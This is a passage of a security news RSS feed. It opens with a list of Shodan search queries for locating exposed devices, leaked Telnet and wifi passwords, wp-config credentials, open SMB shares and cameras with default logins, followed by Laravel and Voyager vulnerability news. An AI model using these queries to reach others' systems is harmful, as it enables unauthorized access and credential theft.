Serial-to-Ethernet Adapter Leaking Telnet Passwords</h3> <p><code>Lantronix password port:30718 -secured</code></p> <h3>Citrix Virtual Apps</h3> <p><code>"Citrix Applications:" port:1604</code></p> <h3>Cisco Smart Install</h3> <p>Vulnerable (kind of "by design," but especially when exposed).</p> <p><code>"smart install client active"</code></p> <h3>PBX IP Phone Gateways</h3> <p><code>PBX "gateway console" -password port:23</code></p> <h3>Polycom Video Conferencing</h3> <p><code>http.title:"- Polycom" "Server: lighttpd"</code> <code>"Polycom Command Shell" -failed port:23</code></p> <h3>Telnet Configuration:</h3> <p><code>"Polycom Command Shell" -failed port:23</code></p> <p>Example: Polycom Video Conferencing</p> <h3>Bomgar Help Desk Portal</h3> <p><code>"Server: Bomgar" "200 OK"</code></p> <h3>Intel Active Management CVE-2017-5689</h3> <p><code>"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995</code> <code>"Active Management Technology"</code></p> <h3>HP iLO 4 CVE-2017-12542</h3> <p><code>HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900</code></p> <h3>Lantronix ethernet adapter's admin interface without password</h3> <p><code>"Press Enter for Setup Mode port:9999"</code></p> <h3>Wifi Passwords:</h3> <p>Helps to find the cleartext wifi passwords in Shodan. <code>html:"def_wirelesspassword"</code></p> <h3>Misconfigured Wordpress Sites:</h3> <p>The wp-config.php if accessed can give out the database credentials. <code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h1>Outlook Web Access:</h1> <h3>Exchange 2007</h3> <p><code>"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"</code></p> <h3>Exchange 2010</h3> <p><code>"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392</code></p> <h3>Exchange 2013 / 2016</h3> <p><code>"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"</code></p> <h3>Lync / Skype for Business</h3> <p><code>"X-MS-Server-Fqdn"</code></p> <h1>Network Attached Storage (NAS)</h1> <h3>SMB (Samba) File Shares</h3> <p>Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.</p> <p><code>"Authentication: disabled" port:445</code></p> <h3>Specifically domain controllers:</h3> <p><code>"Authentication: disabled" NETLOGON SYSVOL -unix port:445</code></p> <h3>Concerning default network shares of QuickBooks files:</h3> <p><code>"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445</code></p> <h3>FTP Servers with Anonymous Login</h3> <p><code>"220" "230 Login successful." port:21</code></p> <h3>Iomega / LenovoEMC NAS Drives</h3> <p><code>"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"</code></p> <h3>Buffalo TeraStation NAS Drives</h3> <p><code>Redirecting sencha port:9000</code></p> <h3>Logitech Media Servers</h3> <p><code>"Server: Logitech Media Server" "200 OK"</code></p> <p>Example: Logitech Media Servers</p> <h3>Plex Media Servers</h3> <p><code>"X-Plex-Protocol" "200 OK" port:32400</code></p> <h3>Tautulli / PlexPy Dashboards</h3> <p><code>"CherryPy/5.1.0" "/home"</code></p> <h3>Home router attached USB</h3> <p><code>"IPC$ all storage devices"</code></p> <h1>Webcams</h1> <h3>Generic camera search</h3> <p><code>title:camera</code></p> <h3>Webcams with screenshots</h3> <p><code>webcam has_screenshot:true</code></p> <h3>D-Link webcams</h3> <p><code>"d-Link Internet Camera, 200 OK"</code></p> <h3>Hipcam</h3> <p><code>"Hipcam RealServer/V1.0"</code></p> <h3>Yawcams</h3> <p><code>"Server: yawcam" "Mime-Type: text/html"</code></p> <h3>webcamXP/webcam7</h3> <p><code>("webcam 7" OR "webcamXP") http.component:"mootools" -401</code></p> <h3>Android IP Webcam Server</h3> <p><code>"Server: IP Webcam Server" "200 OK"</code></p> <h3>Security DVRs</h3> <p><code>html:"DVR_H264 ActiveX"</code></p> <h3>Surveillance Cams:</h3> <p>With username:admin and password: :P <code>NETSurveillance uc-httpd</code> <code>Server: uc-httpd 1.0.0</code></p> <h1>Printers &amp; Copiers:</h1> <h3>HP Printers</h3> <p><code>"Serial Number:" "Built:" "Server: HP HTTP"</code></p> <h3>Xerox Copiers/Printers</h3> <p><code>ssl:"Xerox Generic Root"</code></p> <h3>Epson Printers</h3> <p><code>"SERVER: EPSON_Linux UPnP" "200 OK"</code></p> <p><code>"Server: EPSON-HTTP" "200 OK"</code></p> <h3>Canon Printers</h3> <p><code>"Server: KS_HTTP" "200 OK"</code></p> <p><code>"Server: CANON HTTP Server"</code></p> <h1>Home Devices</h1> <h3>Yamaha Stereos</h3> <p><code>"Server: AV_Receiver" "HTTP/1.1 406"</code></p> <h3>Apple AirPlay Receivers</h3> <p>Apple TVs, HomePods, etc.</p> <p><code>"\x08_airplay" port:5353</code></p> <h3>Chromecasts / Smart TVs</h3> <p><code>"Chromecast:" port:8008</code></p> <h3>Crestron Smart Home Controllers</h3> <p><code>"Model: PYNG-HUB"</code></p> <h1>Random Stuff</h1> <h3>Calibre libraries</h3> <p><code>"Server: calibre" http.status:200 http.title:calibre</code></p> <h3>OctoPrint 3D Printer Controllers</h3> <p><code>title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944</code></p> <h3>Etherium Miners</h3> <p><code>"ETH - Total speed"</code></p> <h3>Apache Directory Listings</h3> <p>Substitute .pem with any extension or a filename like phpinfo.php.</p> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Misconfigured WordPress</h3> <p>Exposed wp-config.php files containing database credentials.</p> <p><code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h3>Too Many Minecraft Servers</h3> <p><code>"Minecraft Server" "protocol 340" port:25565</code></p> <h3>Literally Everything in North Korea</h3> <p><code>net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24</code></p><br><br><div><b><span><a class="kiploit-download" href="https://github.com/nullfuzz-pentest/shodan-dorks" rel="nofollow" target="_blank" title="Download Shodan-Dorks">Download Shodan-Dorks</a></span></b></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel Framework Flaw Allows Attackers to Execute Malicious JavaScript]]></title>
<description><![CDATA[A significant vulnerability has been identified in the Laravel framework, specifically affecting versions between 11.9.0 and 11.35.1. The issue revolves around improper encoding of request parameters on the error page when the application is running in debug mode, leading to reflected cross-site ...]]></description>
<link>https://tsecurity.de/de/2658255/hacking/laravel-framework-flaw-allows-attackers-to-execute-malicious-javascript/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2658255/hacking/laravel-framework-flaw-allows-attackers-to-execute-malicious-javascript/</guid>
<pubDate>Mon, 10 Mar 2025 15:04:23 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A significant vulnerability has been identified in the Laravel framework, specifically affecting versions between 11.9.0 and 11.35.1. The issue revolves around improper encoding of request parameters on the error page when the application is running in debug mode, leading to reflected cross-site scripting (XSS). This flaw has been assigned the CVE identifier CVE-2024-13918 and has […]</p>
<p>The post <a href="https://gbhackers.com/laravel-framework-flaw/">Laravel Framework Flaw Allows Attackers to Execute Malicious JavaScript</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-27515 | Laravel Framework up to 11.44.0/12.1.0 wildcards or matching symbols (GHSA-78fx-h6xr-vch4 / Nessus ID 232181)]]></title>
<description><![CDATA[A vulnerability was found in Laravel Framework up to 11.44.0/12.1.0. It has been classified as critical. Affected is an unknown function. The manipulation leads to improper neutralization of wildcards or matching symbols.

This vulnerability is traded as CVE-2025-27515. It is possible to launch t...]]></description>
<link>https://tsecurity.de/de/2652691/sicherheitsluecken/cve-2025-27515-laravel-framework-up-to-114401210-wildcards-or-matching-symbols-ghsa-78fx-h6xr-vch4-nessus-id-232181/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2652691/sicherheitsluecken/cve-2025-27515-laravel-framework-up-to-114401210-wildcards-or-matching-symbols-ghsa-78fx-h6xr-vch4-nessus-id-232181/</guid>
<pubDate>Thu, 06 Mar 2025 18:53:30 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.laravel:framework">Laravel Framework up to 11.44.0/12.1.0</a>. It has been classified as <a href="https://vuldb.com/?kb.risk">critical</a>. Affected is an unknown function. The manipulation leads to improper neutralization of wildcards or matching symbols.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.298716">CVE-2025-27515</a>. It is possible to launch the attack remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel IDEA 10 vervollständigt Datenbank- und Feldeingaben automatisch]]></title>
<description><![CDATA[Version 10 des PhpStorm-Plug-ins unterstützt Inertia.js und Laravel Facades. Die intelligente Datenbankvervollständigung optimiert den Entwicklungsprozess.]]></description>
<link>https://tsecurity.de/de/2626230/it-nachrichten/laravel-idea-10-vervollstaendigt-datenbank-und-feldeingaben-automatisch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2626230/it-nachrichten/laravel-idea-10-vervollstaendigt-datenbank-und-feldeingaben-automatisch/</guid>
<pubDate>Fri, 21 Feb 2025 11:00:38 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Version 10 des PhpStorm-Plug-ins unterstützt Inertia.js und Laravel Facades. Die intelligente Datenbankvervollständigung optimiert den Entwicklungsprozess.]]></content:encoded>
</item>
<item>
<title><![CDATA[Developer Snapshots: Kleinere News der letzten Woche]]></title>
<description><![CDATA[Die Übersicht enthält kleine, aber interessante Meldungen zu Laravel, Crane, Unicode, Eclipse SUMO, Plotly, Aider, RAG Challenge und Crates.io]]></description>
<link>https://tsecurity.de/de/2601247/it-nachrichten/developer-snapshots-kleinere-news-der-letzten-woche/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2601247/it-nachrichten/developer-snapshots-kleinere-news-der-letzten-woche/</guid>
<pubDate>Sat, 08 Feb 2025 08:45:31 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Übersicht enthält kleine, aber interessante Meldungen zu Laravel, Crane, Unicode, Eclipse SUMO, Plotly, Aider, RAG Challenge und Crates.io]]></content:encoded>
</item>
<item>
<title><![CDATA[1- Click RCE Vulnerability in Voyager PHP Allow Attackers Execute Arbitrary Code]]></title>
<description><![CDATA[A recently disclosed security vulnerability in the Voyager PHP package, a popular tool for managing Laravel applications, has raised significant concerns regarding the potential for remote code execution (RCE) on affected servers. This vulnerability, identified through ongoing security scans usin...]]></description>
<link>https://tsecurity.de/de/2592887/hacking/1-click-rce-vulnerability-in-voyager-php-allow-attackers-execute-arbitrary-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2592887/hacking/1-click-rce-vulnerability-in-voyager-php-allow-attackers-execute-arbitrary-code/</guid>
<pubDate>Tue, 04 Feb 2025 17:04:39 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A recently disclosed security vulnerability in the Voyager PHP package, a popular tool for managing Laravel applications, has raised significant concerns regarding the potential for remote code execution (RCE) on affected servers. This vulnerability, identified through ongoing security scans using SonarQube Cloud, could allow an authenticated user to inadvertently execute arbitrary code by clicking on […]</p>
<p>The post <a href="https://gbhackers.com/1-click-rce-vulnerability-in-voyager-php/">1- Click RCE Vulnerability in Voyager PHP Allow Attackers Execute Arbitrary Code</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel Cloud startet am 24. Februar 2025: Neue Plattform für Developer]]></title>
<description><![CDATA[Laravel Cloud ist eine Plattform, die das Bereitstellen und Skalieren von Anwendungen erleichtern soll. Drei Preispläne stehen zur Auswahl.]]></description>
<link>https://tsecurity.de/de/2591681/it-nachrichten/laravel-cloud-startet-am-24-februar-2025-neue-plattform-fuer-developer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2591681/it-nachrichten/laravel-cloud-startet-am-24-februar-2025-neue-plattform-fuer-developer/</guid>
<pubDate>Tue, 04 Feb 2025 09:30:47 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Laravel Cloud ist eine Plattform, die das Bereitstellen und Skalieren von Anwendungen erleichtern soll. Drei Preispläne stehen zur Auswahl.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-40482 | Laravel up to 9.31.x HTTP/2 hasValidCredentials timing discrepancy]]></title>
<description><![CDATA[A vulnerability was found in Laravel up to 9.31.x and classified as problematic. This issue affects the function hasValidCredentials of the component HTTP2 Handler. The manipulation leads to observable timing discrepancy.

The identification of this vulnerability is CVE-2022-40482. The attack can...]]></description>
<link>https://tsecurity.de/de/2591035/sicherheitsluecken/cve-2022-40482-laravel-up-to-931x-http2-hasvalidcredentials-timing-discrepancy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2591035/sicherheitsluecken/cve-2022-40482-laravel-up-to-931x-http2-hasvalidcredentials-timing-discrepancy/</guid>
<pubDate>Mon, 03 Feb 2025 23:21:48 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.laravel">Laravel up to 9.31.x</a> and classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. This issue affects the function <code>hasValidCredentials</code> of the component <em>HTTP2 Handler</em>. The manipulation leads to observable timing discrepancy.

The identification of this vulnerability is <a href="https://vuldb.com/?source_cve.227417">CVE-2022-40482</a>. The attack can only be done within the local network. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Warten auf Patch: Das Admin-Interface Voyager für Laravel-Apps ist verwundbar]]></title>
<description><![CDATA[Sicherheitsforscher warnen vor möglichen Attacken auf Voyager. Bislang haben sich die Entwickler zu den Sicherheitslücken nicht geäußert.]]></description>
<link>https://tsecurity.de/de/2583035/it-nachrichten/warten-auf-patch-das-admin-interface-voyager-fuer-laravel-apps-ist-verwundbar/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2583035/it-nachrichten/warten-auf-patch-das-admin-interface-voyager-fuer-laravel-apps-ist-verwundbar/</guid>
<pubDate>Thu, 30 Jan 2025 16:30:51 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sicherheitsforscher warnen vor möglichen Attacken auf Voyager. Bislang haben sich die Entwickler zu den Sicherheitslücken nicht geäußert.]]></content:encoded>
</item>
<item>
<title><![CDATA[Warten auf Patch: Das Admin-Interface Voyager für Laravel-Apps ist verwundbar]]></title>
<description><![CDATA[Sicherheitsforscher warnen vor möglichen Attacken auf Voyager. Bislang haben sich die Entwickler zu den Sicherheitslücken nicht geäußert.]]></description>
<link>https://tsecurity.de/de/2583004/it-security-nachrichten/warten-auf-patch-das-admin-interface-voyager-fuer-laravel-apps-ist-verwundbar/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2583004/it-security-nachrichten/warten-auf-patch-das-admin-interface-voyager-fuer-laravel-apps-ist-verwundbar/</guid>
<pubDate>Thu, 30 Jan 2025 16:19:05 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sicherheitsforscher warnen vor möglichen Attacken auf Voyager. Bislang haben sich die Entwickler zu den Sicherheitslücken nicht geäußert.]]></content:encoded>
</item>
<item>
<title><![CDATA[Warten auf Patch: Das Admin-Interface Voyager für Laravel-Apps ist verwundbar]]></title>
<description><![CDATA[Sicherheitsforscher warnen vor möglichen Attacken auf Voyager. Bislang haben sich die Entwickler zu den Sicherheitslücken nicht geäußert.]]></description>
<link>https://tsecurity.de/de/2583005/it-security-nachrichten/warten-auf-patch-das-admin-interface-voyager-fuer-laravel-apps-ist-verwundbar/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2583005/it-security-nachrichten/warten-auf-patch-das-admin-interface-voyager-fuer-laravel-apps-ist-verwundbar/</guid>
<pubDate>Thu, 30 Jan 2025 16:19:05 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sicherheitsforscher warnen vor möglichen Attacken auf Voyager. Bislang haben sich die Entwickler zu den Sicherheitslücken nicht geäußert.]]></content:encoded>
</item>
<item>
<title><![CDATA[PHP package Voyager flaws expose to one-click RCE exploits]]></title>
<description><![CDATA[The open-source PHP package Voyager is affected by three vulnerabilities that could be exploited to achieve one-click remote code execution on affected instances. Voyager is a popular open-source PHP package for managing Laravel applications, offering an admin interface, BREAD operations, media, ...]]></description>
<link>https://tsecurity.de/de/2582580/it-security-nachrichten/php-packagevoyager-flaws-expose-to-one-click-rce-exploits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2582580/it-security-nachrichten/php-packagevoyager-flaws-expose-to-one-click-rce-exploits/</guid>
<pubDate>Thu, 30 Jan 2025 13:49:52 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The open-source PHP package Voyager is affected by three vulnerabilities that could be exploited to achieve one-click remote code execution on affected instances. Voyager is a popular open-source PHP package for managing Laravel applications, offering an admin interface, BREAD operations, media, and user management. During an ordinary scan activity, SonarSource researchers reported an arbitrary file write vulnerability in […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel admin package Voyager vulnerable to one-click RCE flaw]]></title>
<description><![CDATA[Three vulnerabilities discovered in the open-source PHP package Voyager for managing Laravel applications could be used for remote code execution attacks. [...]]]></description>
<link>https://tsecurity.de/de/2581174/it-security-nachrichten/laravel-admin-package-voyager-vulnerable-to-one-click-rce-flaw/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2581174/it-security-nachrichten/laravel-admin-package-voyager-vulnerable-to-one-click-rce-flaw/</guid>
<pubDate>Wed, 29 Jan 2025 20:32:47 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Three vulnerabilities discovered in the open-source PHP package Voyager for managing Laravel applications could be used for remote code execution attacks. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Break the Wall from Bottom: Automated Discovery of Protocol-Level Evasion Vulnerabilities]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 3x - Views:27 Break the Wall from Bottom: Automated Discovery of Protocol-Level Evasion Vulnerabilities in Web Application Firewalls

Web Application Firewalls (WAFs) are a crucial line of defense against web-based attacks. However, an emerging threat comes from pro...]]></description>
<link>https://tsecurity.de/de/2572297/it-security-video/break-the-wall-from-bottom-automated-discovery-of-protocol-level-evasion-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2572297/it-security-video/break-the-wall-from-bottom-automated-discovery-of-protocol-level-evasion-vulnerabilities/</guid>
<pubDate>Fri, 24 Jan 2025 19:48:27 +0100</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/RgBf7P2BkJM/hqdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 3x - Views:27 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/RgBf7P2BkJM?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Break the Wall from Bottom: Automated Discovery of Protocol-Level Evasion Vulnerabilities in Web Application Firewalls<br />
<br />
Web Application Firewalls (WAFs) are a crucial line of defense against web-based attacks. However, an emerging threat comes from protocol-level evasion vulnerabilities, in which adversaries exploit parsing discrepancies between the WAF HTTP parser and those of web applications to circumvent WAFs. Currently, uncovering these vulnerabilities still depends on manual, ad hoc methods.<br />
<br />
In this talk, we propose WAF Manis, a novel testing framework to automatically discover protocol-level evasion vulnerabilities in WAFs. We evaluated WAF Manis against 14 popular WAFs including Cloudflare and ModSecurity and 20 popular web frameworks including Laravel and Spring. In total, we discovered 311 protocol-level evasion cases affecting all tested WAFs and applications. Due to the generic nature of protocol-level evasions, these evasion vulnerabilities do not hinge on specific payload patterns and can transmit any malicious payloads - for instance, SQL injection, XSS, or Log4jShell - to the target websites.<br />
<br />
We further analyzed these vulnerabilities and identified three primary reasons contributing to WAF evasions. We have reported those identified vulnerabilities to the affected providers and received acknowledgments and bug bounty rewards from Cloudflare WAF, Fortinet WAF, Alibaba Cloud WAF, Huawei Cloud WAF, ModSecurity, Go security Team, and the PHP security team.<br />
<br />
By:<br />
Qi Wang  |  P.h.D Student, Tsinghua University<br />
Jianjun Chen  |  Assistant Professor, Tsinghua University and Zhongguancun Laboratory<br />
Run Guo  |  Ph.D. Candidate, Tsinghua University<br />
Chao Zhang  |  Tenured Associate Professor, Tsinghua University and Zhongguancun Laboratory<br />
Haixin Duan  |  Professor, Tsinghua University; Zhongguancun Laboratory; QI-ANXIN Technology Research Institute<br />
<br />
Full Abstract and Presentation Materials:<br />
https://www.blackhat.com/us-24/briefings/schedule/#break-the-wall-from-bottom-automated-discovery-of-protocol-level-evasion-vulnerabilities-in-web-application-firewalls-40407<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ask Slashdot:  What's the Best Way to Transfer Legacy PHP Code to a Modern Framework?]]></title>
<description><![CDATA[Slashdot reader rzack writes:
Since 1999, I've written a huge amount of PHP code, for dozens of applications and websites. Most of it has been continually updated, and remains active and in-production, in one form or another. 

Here's the thing. It's all hand-written using vi, even to this day. 
...]]></description>
<link>https://tsecurity.de/de/2547189/it-security-nachrichten/ask-slashdot-whats-the-best-way-to-transfer-legacy-php-code-to-a-modern-framework/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2547189/it-security-nachrichten/ask-slashdot-whats-the-best-way-to-transfer-legacy-php-code-to-a-modern-framework/</guid>
<pubDate>Sun, 12 Jan 2025 17:48:11 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Slashdot reader rzack writes:
Since 1999, I've written a huge amount of PHP code, for dozens of applications and websites. Most of it has been continually updated, and remains active and in-production, in one form or another. 

Here's the thing. It's all hand-written using vi, even to this day. 

Is there any benefit to migrating this codebase to a more modern PHP framework, like Laravel? And is there an easy and minimally intrusive way this can be done en-masse, across dozens of applications and websites? 

Or at this point should I just stick with vi?
 

Share your thoughts and suggestions in the comments. 

What's the best way to transfer legacy PHP code to a modern framework?<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Ask+Slashdot%3A++What's+the+Best+Way+to+Transfer+Legacy+PHP+Code+to+a+Modern+Framework%3F%3A+https%3A%2F%2Fask.slashdot.org%2Fstory%2F25%2F01%2F12%2F0319219%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fask.slashdot.org%2Fstory%2F25%2F01%2F12%2F0319219%2Fask-slashdot-whats-the-best-way-to-transfer-legacy-php-code-to-a-modern-framework%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://ask.slashdot.org/story/25/01/12/0319219/ask-slashdot-whats-the-best-way-to-transfer-legacy-php-code-to-a-modern-framework?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-43617 | Laravel up to 8.70.2 on Debian Image Upload ValidatesAttributes.php unrestricted upload (EDB-50525)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in Laravel up to 8.70.2 on Debian. This vulnerability affects unknown code of the file Illuminate/Validation/Concerns/ValidatesAttributes.php of the component Image Upload Handler. The manipulation leads to unrestricted upload.

This vulnerability ...]]></description>
<link>https://tsecurity.de/de/2516406/sicherheitsluecken/cve-2021-43617-laravel-up-to-8702-on-debian-image-upload-validatesattributesphp-unrestricted-upload-edb-50525/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2516406/sicherheitsluecken/cve-2021-43617-laravel-up-to-8702-on-debian-image-upload-validatesattributesphp-unrestricted-upload-edb-50525/</guid>
<pubDate>Wed, 25 Dec 2024 15:35:56 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">critical</a> was found in <a href="https://vuldb.com/?product.laravel">Laravel up to 8.70.2</a> on Debian. This vulnerability affects unknown code of the file <em>Illuminate/Validation/Concerns/ValidatesAttributes.php</em> of the component <em>Image Upload Handler</em>. The manipulation leads to unrestricted upload.

This vulnerability was named <a href="https://vuldb.com/?source_cve.186652">CVE-2021-43617</a>. The attack needs to be initiated within the local network. Furthermore, there is an exploit available.

It is recommended to apply a patch to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (gst-plugins-base1.0, libxstream-java, php-laravel-framework, python-urllib3, and sqlparse), Fedora (chromium, libcomps, libdnf, mingw-directxmath, mingw-gstreamer1, mingw-gstreamer1-plugins-bad-free, mingw-gstreamer1-plugins-base, mingw-gstreamer1-plug...]]></description>
<link>https://tsecurity.de/de/2513792/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2513792/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 23 Dec 2024 15:51:51 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (gst-plugins-base1.0, libxstream-java, php-laravel-framework, python-urllib3, and sqlparse), <b>Fedora</b> (chromium, libcomps, libdnf, mingw-directxmath, mingw-gstreamer1, mingw-gstreamer1-plugins-bad-free, mingw-gstreamer1-plugins-base, mingw-gstreamer1-plugins-good, mingw-orc, ofono, prometheus-podman-exporter, python3-docs, python3.13, and webkitgtk), <b>Mageia</b> (mozjs78, thunderbird, and tomcat, tomcat packages), <b>SUSE</b> (aalto-xml, flatten-maven-plugin, jctools, moditect, netty, netty-tcnative, chromedriver, govulncheck-vulndb, grpc, kernel, python-aiohttp, python-python-sql, and vim), and <b>Ubuntu</b> (linux, linux-gkeop, linux-ibm, linux-ibm-5.15, linux-kvm,
 linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oracle-5.15 and linux-aws, linux-aws-5.4, linux-bluefield, linux-ibm, linux-ibm-5.4,
 linux-oracle, linux-oracle-5.4, linux-xilinx-zynqmp).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-52301 | Laravel Framework up to 11.31.0 Query register_argc_argv argument injection (GHSA-gv7v-rgg6-548h)]]></title>
<description><![CDATA[A vulnerability was found in Laravel Framework up to 11.31.0. It has been declared as critical. Affected by this vulnerability is the function register_argc_argv of the component Query Handler. The manipulation leads to argument injection.

This vulnerability is known as CVE-2024-52301. The attac...]]></description>
<link>https://tsecurity.de/de/2511014/sicherheitsluecken/cve-2024-52301-laravel-framework-up-to-11310-query-registerargcargv-argument-injection-ghsa-gv7v-rgg6-548h/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2511014/sicherheitsluecken/cve-2024-52301-laravel-framework-up-to-11310-query-registerargcargv-argument-injection-ghsa-gv7v-rgg6-548h/</guid>
<pubDate>Sat, 21 Dec 2024 18:51:18 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.laravel:framework">Laravel Framework up to 11.31.0</a>. It has been declared as <a href="https://vuldb.com/?kb.risk">critical</a>. Affected by this vulnerability is the function <code>register_argc_argv</code> of the component <em>Query Handler</em>. The manipulation leads to argument injection.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.284245">CVE-2024-52301</a>. The attack can be launched remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel 11.0 Cross Site Scripting]]></title>
<description><![CDATA[Topic: Laravel 11.0 Cross Site Scripting Risk: Medium Text:/*!  - # VULNERABILITY: Cross Site Scripting Laravel version 11.0   - # Authenticated Persistent XSS  - # GOOGLE DORK: inurl:....]]></description>
<link>https://tsecurity.de/de/2506100/poc/laravel-110-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2506100/poc/laravel-110-cross-site-scripting/</guid>
<pubDate>Wed, 18 Dec 2024 22:22:36 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Laravel 11.0 Cross Site Scripting Risk: Medium Text:/*!  - # VULNERABILITY: Cross Site Scripting Laravel version 11.0   - # Authenticated Persistent XSS  - # GOOGLE DORK: inurl:....]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-21546 | UniSharp laravel-filemanager up to 2.9.0 code injection]]></title>
